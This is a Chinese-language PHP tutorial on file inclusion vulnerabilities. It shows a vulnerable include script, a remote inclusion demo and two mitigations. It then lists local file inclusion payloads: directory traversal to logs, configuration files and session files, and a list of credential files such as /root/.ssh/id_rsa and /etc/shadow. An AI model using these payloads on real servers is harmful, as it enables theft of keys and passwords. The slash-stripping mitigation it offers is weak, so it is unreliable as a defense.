PHP 网络开发详解之远程文件包含漏洞

以下代码（Code）实现了根据浏览器地址栏参数的文件名称包含不同文件的功能。

复制代码

代码如下:

<?php

$file_name

=

$_GET["filename"]

//获得当前文件名

include("$file_name

")

//包含文件

//一些其他 *** 作

?>

这时，通过在地址栏上指定不同的文件名就可以实现包含不同文件并执行的功能。例如，通过在浏览器上访问http://localhost/test.php?filename=myinc.php就可以在代码（Code）中包含并执行myinc.php文件。

由于上面的代码（Code）没有进行任何错误处理，在浏览器上不加参数运行，所以将得到以下运行结果。

Warning:

include(.php)

[function.include]:

failed

to

open

stream:

No

such

file

or

directory

in

C:\Program

Files\xampp\htdocs\Bugs\test6.php

on

line

3

Warning:

include()

[function.include]:

Failed

opening

'.php'

for

inclusion

(include_path='.C:\Program

Files\xampp\php\pear\')

in

C:\Program

Files\xampp\htdocs\Bugs\test6.php

on

line

3

访问者通过读取这段错误信息，可以得知当前的 *** 作是一个文件包含 *** 作。这时，可以在自己的服务器上放置一个相应的脚本代码。需要注意的是PHP在获取远程文件时获得的是远程服务器的最终输出结果，而不是文件本身。该脚本代码位于192.168.0.1服务器上，文件名为hello.txt，脚本代码（Code）如下所示。

复制代码

代码如下:

<?php

echo

"hello

world!"

?>

这时，通过在浏览器中访问http://localhost/test.php?filename=http://192.168.0.1/hello.txt就可以运行hello.txt中的脚本了。

为了解决这个问题，一种方式是完善代码的错误信息，使访问者无法知道当前脚本正在包含参数中指定的文件。修改后的代码（Code）如下所示。

复制代码

代码如下:

<?php

$file_name

=

$_GET["filename"]

//获得当前文件名

if(!@include("$file_name.php"))

//包含文件

{

die("页面在浏览过程中出现错误")

}

//一些其他 *** 作

?>

修改后，如果在被包含的文件无法找到时将出现“页面在浏览过程中出现错误”的错误信息，访问者将无法获得当前页面的具体 *** 作信息。

第二种方式可以更加有效地防止远程文件包含攻击。方式是替换地址栏参数中的斜线“/”。这样，在地址栏参数中输入远程文件地址时，代码将无法正确地获得参数。修改后的代码（Code）如下所示。

复制代码

代码如下:

<?php

$file_name

=

str_replace('/',

'',

$_GET["filename"])

//获得当前文件名

if(!@include("$file_name.php"))

//包含文件

{

die("页面在浏览过程中出现错误")

}

//一些其他 *** 作

?>

这样，在浏览器中访问http://localhost/test.php?filename=http://192.168.0.1/hello.txt

时，实际上PHP代码（Code）获得的包含文件名称是http:192.168.0.1bugstest6_test。页面将不会包含远程文件，并显示相应的错误信息。

假如你的 include 中包含 可变的参数，而且可悲外部修改，例如：

<?php

include("inc/".$_GET['file'])

这样的话，就会引发漏洞，用户可以构造任意参数来读取你的文件。

在接下来的内容中会以代码样本作为例子，来给大家介绍各种奇葩猥琐的利用姿势。

0x01 普通本地文件包含

1

<?php

include("inc/"

. $_GET['file'])

?>

包含同目录下的文件：

?file=.htaccess

目录遍历：

?file=../../../../../../../../../var/lib/locate.db ?file=../../../../../../../../../var/lib/mlocate/mlocate.db

（Linux中这两个文件储存着所有文件的路径，需要root权限）

包含错误日志： ?file=../../../../../../../../../var/log/apache/error.log （试试把UA设置为“”来使payload进入日志）

获取web目录或者其他配置文件：

?file=../../../../../../../../../usr/local/apache2/conf/httpd.conf

（更多→http://wiki.apache.org/httpd/DistrosDefaultLayout）

包含上传的附件：

?file=../attachment/media/xxx.file

读取session文件：

?file=../../../../../../tmp/sess_tnrdo9ub2tsdurntv0pdir1no7

（session文件一般在/tmp目录下，格式为sess_[your phpsessid value]，有时候也有可能在/var/lib/php5之类的，在此之前建议先读取配置文件。在某些特定的情况下如果你能够控制session的值，也许你能够获得一个shell）

如果拥有root权限还可以试试读这些东西：

/root/.ssh/authorized_keys

/root/.ssh/id_rsa

/root/.ssh/id_rsa.keystore

/root/.ssh/id_rsa.pub

/root/.ssh/known_hosts

/etc/shadow

/root/.bash_history

/root/.mysql_history

/proc/self/fd/fd[0-9]* (文件标识符)

/proc/mounts

/proc/config.gz

如果有phpinfo可以包含临时文件：

参见http://hi.baidu.com/mmnwzsdvpkjovwr/item/3f7ceb39965145eea984284el

---